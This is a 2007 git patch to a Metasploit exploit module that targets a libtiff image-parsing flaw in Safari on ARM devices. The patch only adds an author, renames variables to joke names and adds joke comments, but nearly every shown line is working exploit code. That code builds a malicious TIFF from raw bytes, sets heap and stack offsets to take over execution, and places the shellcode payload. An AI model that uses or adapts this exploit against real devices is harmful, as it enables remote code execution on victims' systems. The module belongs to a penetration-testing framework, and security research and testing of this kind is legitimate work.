From d3c96f0b4501d5dee2e3a58282f89ba742aedf89 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 16 Oct 2007 05:40:36 +0000
Subject: [PATCH] hehe-ified.

git-svn-id: file:///home/svn/framework3/trunk@5149 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/osx/armle/safari_libtiff.rb | 27 +++++++++-----------
 1 file changed, 12 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb
index 6fea291f68..eafa05bd71 100644
--- a/modules/exploits/osx/armle/safari_libtiff.rb
+++ b/modules/exploits/osx/armle/safari_libtiff.rb
@@ -31,7 +31,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 tools installed will need to use a special payload.
 },
 'License' => MSF_LICENSE,
- 'Author' => ['hdm'],
+ 'Author' => ['hdm', 'Kevin Finisterre '],
 'Version' => '$Revision$',
 'References' =>
 [
@@ -102,8 +102,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
 #
- dlen = 0x1000
- data =
+ lolz = 0x1000
+ tiff =
 "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
 "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
@@ -114,26 +114,24 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
 "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
 "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
- [dlen].pack("V") +
+ [lolz].pack("V") +
 "\x84\x00\x00\x00\x00\x00\x00\x00"
-
- # Randomize the bajeezus out of our data
- patt = rand_text(dlen)
+ hehe = rand_text(lolz)
 # Were going to candy mountain!
- patt[120, 4] = [target['Magic']].pack("V")
+ hehe[120, 4] = [target['Magic']].pack("V")
 # >> add r0, r4, #0x30
- patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
+ hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
 # Candy mountain, Charlie!
 # >> mov r1, sp
 # It will be an adventure!
 # >> mov r2, r8
- patt[ 92, 4] = [ patt.length ].pack("V")
+ hehe[ 92, 4] = [ hehe.length ].pack("V")
 # Its a magic leoplurodon!
 # It has spoken!
@@ -158,7 +156,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 # We made it to candy mountain!
 # Go inside Charlie!
 # sub sp, r7, #0x14
- patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
+ hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
 # Goodbye Charlie!
 # ;; targ['Heap'] + 0x48 becomes the stack pointer
@@ -168,13 +166,12 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 # >> ldmia sp!, {r4, r5, r6, r7, pc}
 # Return back to the copied heap data
- patt[192, 4] = [ targ['Heap'] + 196 ].pack("V")
+ hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")
 # Insert our actual shellcode at heap location + 196
- patt[196, payload.encoded.length] = payload.encoded
+ hehe[196, payload.encoded.length] = payload.encoded
- data << patt
- data
+ tiff << hehe
 end
 end